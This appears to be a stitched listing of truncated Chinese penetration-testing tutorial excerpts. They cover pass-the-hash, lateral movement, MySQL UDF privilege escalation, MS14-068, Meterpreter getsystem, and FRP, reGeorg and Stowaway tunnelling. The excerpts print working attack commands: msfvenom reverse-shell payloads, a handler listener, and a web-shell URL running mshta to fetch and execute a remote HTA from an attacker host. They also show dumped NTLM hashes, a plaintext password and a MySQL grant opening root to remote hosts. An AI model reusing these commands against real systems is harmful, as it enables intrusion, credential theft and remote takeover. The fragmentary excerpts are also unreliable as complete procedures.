PTH简介PASS THE Hash 也叫 Hash 传递攻击,简称 PTH。模拟用户登录不需要用户明文密码,就可以直接用获取到的 Hash 来登录目标系统。
利用成功的前提条件是:
开启 445 端口 SMB 服务
开启 admin$ 共享
Metasploit psexec模块获取Hash通过获取的Meterpreter会话执行hashdump得到用户hash值
1meterpreter > hashdump
12Administrator:500:aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
执行直接就获取到meterpreter的PTH模块:exploit/windows/smb/psexec
工作组
添加路由
123sessions 1run autoroute -s 10.10. ...
横向移动简介当攻击者在拿下一台内网主机后,通常会利用当前拿下的机器当作跳板,进一步攻击内网其他主机,扩大攻击影响范围。
横向移动有三个主要阶段:
侦察(主机信息收集、内网网络结构信息收集)
凭据/特权收集(主机密码凭证)
对网络中其他计算机的访问权限
获得权限MSF生成HTA反弹shell
1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=4002 -f hta-psh -o 4002.hta
通过WEB漏洞反弹shell
1http://1xx.xx.xx.95:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=cmd /c mshta http://192.168.58.133:8000/6666.hta
得到MSF会话,获取账号密码及Hash
1hashdump
123getsystemload kiwicreds_all
1web\administrator 1qaz@WSX
登录验证
123c ...
MySQL提权利用场景目标主机开启MySQL远程连接,并且攻击者已经获得MySQL数据库连接的用户名和密码信息,通过UDF手工提权获得操作系统管理员权限。
拥有数据库账号密码,可以远程连接数据
拥有Webshell,可以连接数据库
能够写文件
可以操作数据库
如何获取数据库账号密码?
找数据库配置文件
通过Webshell对数据库进行本地爆破
Hash获取MySQL密码
UDF提权简介
UDF提权
UDF提权指的是利用注入漏洞或其他漏洞获取了数据库操作权限后,通过数据库输出具有提权功能的文件并执行提权操作。
UDF介绍
UDF: User Defined Function (用户自定义函数),为用户提供了一种高效创建函数的方式攻击者编写调用系统cmd命令(linux下相当于调用shell命令)的udf.dll文件,并将udf.dll导出到指定目录下,攻击者创建一个指向udf.dll的自定义函数func,每次在数据库查询中执行func函数等价于在cmd命令中执行命令。
dll文件存放目录
Windows 2003:C:\windows\目录下MySQL 5.1 版本后: ...
局域网访问打开CMD,导航到当前MySQL的bin路径,因为用的是phpstudy_pro集成环境,如下图
访问MySQL:输入MySQL -u root -p,点击Enter键,即可看到密码输入框:
输入密码,点需Enter键确定,即可看到如下图:表示访问MySQL成功。
首先选择数据库:
1use mysql;
添加局域网访问:
1update user set host = '%' where user = 'root';
或者
1GRANT ALL PRIVILEGES ON *.* TO 'root'@'10.62.144.186' IDENTIFIED BY 'root';
将 *.* 上的所有权限授予由“root”标识的根“@”本地主机“;
刷新权限:
1flush privileges;
点击Enter键确定,出现如下图,表示刷新成功
使用Navicat连接Mysql(局域网连接,图片用的是用户hbsx,如果没有该用户可以创建该用户,上面 ...
域提权简介域环境提权,就是从普通域用户权限到域控管理权限
域渗透的主要目标就是拿下域控管理权限,拿下域控制器,进而拿下整个域
MS14-068漏洞简介该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。
微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068
漏洞原理服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控DC验证PAC的话,那么客户端可以伪造域管的权限来访问服务器。
利用条件
域控没有安装MS14-068的补丁KB3011780
拥有一台域内主机权限
具有普通域用户密码、Hash值以及用户SUID
漏洞利用
利用环境
http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
利用工具
123MS14-068.exe: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068Psexec: h ...
Metasploit提权
生成一个Payload,并创建监听
12345678msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=6666 -f exe -oxx.exe# handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.247.135 -P 6666use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset LHOST 192.168.1.227set LPORT 6666exploit
运行木马文件,MSF获得meterpreter会话
Meterpreter提权Meterpreter自动提权命令
12getuidgetsystem
getsystem是由Metasploit-Framework提供的一个模块,它可以将一个管理帐户(通常为本地Administrator账户)提升为本地SYSTEM帐户
执行成功
...
权限提升简介权限提升概述Windows 计算机中常见的权限
用户权限(Users)
管理员权限(Administrators)
系统权限 (SYSTEM)
访客权限 (Guest)
权限提升(Privilege Escalation ):攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获得对整个系统得控制权。
Windows提权
123user --> administratoradministrator --> systemservices --> system
Linux提权
1user --> root
提权分类
本地提权
在一个低权限用户下,通过一些条件(应用程序漏洞、系统漏洞等)提升到系统管理员权限或系统最高权限。
远程提权
攻击者通过漏洞利用程序直接获取远程服务器的权限。
操作系统提权
Windows:MS06-067、MS10-084、MS11-014、MS11-05、MS12-020、MS16-032 等Linux:CVE-2017-7308、CVE-2017- ...
HTTP代理reGeorg
https: github.com/NoneNotNull/reGeorg
reGeorg 是 reDuh 的升级版,主要功能是把内网服务器端口的数据通过 HTTP/HTTPS 隧道转发到本机,实现基于 HTTP 协议的通信。
reGeorg 支持 ASPX,ASHX,PHP,JSP 等WEB脚本,并特别提供了一个 tomcat5 版本。
1234567891011usage: reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v]Socks server for reGeorg HTTP(s) tunnelleroptional arguments: -h, help 显示此帮助信息并退出 -l , listen-on 默认监听地址 -p , listen-port 默认监听端口 -r , read-buff 本地读取缓冲区,每个POST发送的最大数据 -u , url 包含隧道脚本的url -v , verbose 详细输出(INFO|DEBUG)
1python2 reGeor ...
Stowaway简介
https://github.com/ph4ntonn/Stowaway
Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具
用户可使用此程序将外部流量通过多个节点代理至内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能
名词解释
节点: 指 admin || agent
主动模式: 指当前操作的节点主动连接另一个节点
被动模式: 指当前操作的节点监听某个端口,等待另一个节点连接
上游: 指当前操作的节点与其父节点之间的流量
下游: 指当前操作的节点与其所有子节点之间的流量
Stowaway使用说明Stowaway分为两个角色,分别是:
admin 渗透测试者使用的主控端
agent 渗透测试者部署的被控端
adminadmin 用法:
12345>> ./stowaway_admin -l <port> -s [secret]>> ./stowaway_admin -c <ip:port> -s [secret]>> ./stowaway_admin -c & ...
渗透场景
测试Target1
信息收集(同代理实战01)
分析利用(同代理实战01)
主机信息收集(同代理实战01)
建立Socks代理
FRP建立Socks代理
模拟VPS启动frps
VPS:192.168.0.132
12345# 启动frps./frps -c frps.ini# 查看frps配置文件cat frps.ini
12[common]bind_port = 7000
Target1启动frpc
Target1:192.168.0.133
12345# 启动frpc./frpc -c frpc.ini# 查看frpc配置文件cat frpc.ini
1234567[common]server_addr = 192.168.0.132server_port = 7000[socks5]type = tcpplugin = socks5remote_port = 10088
测试Target2
信息收集(同代理实战01)
分析利用(同代理实战01)
配置Socks代理连接Webshell(同代理实战01)
主机信息收集(同代理实战01)
FRP ...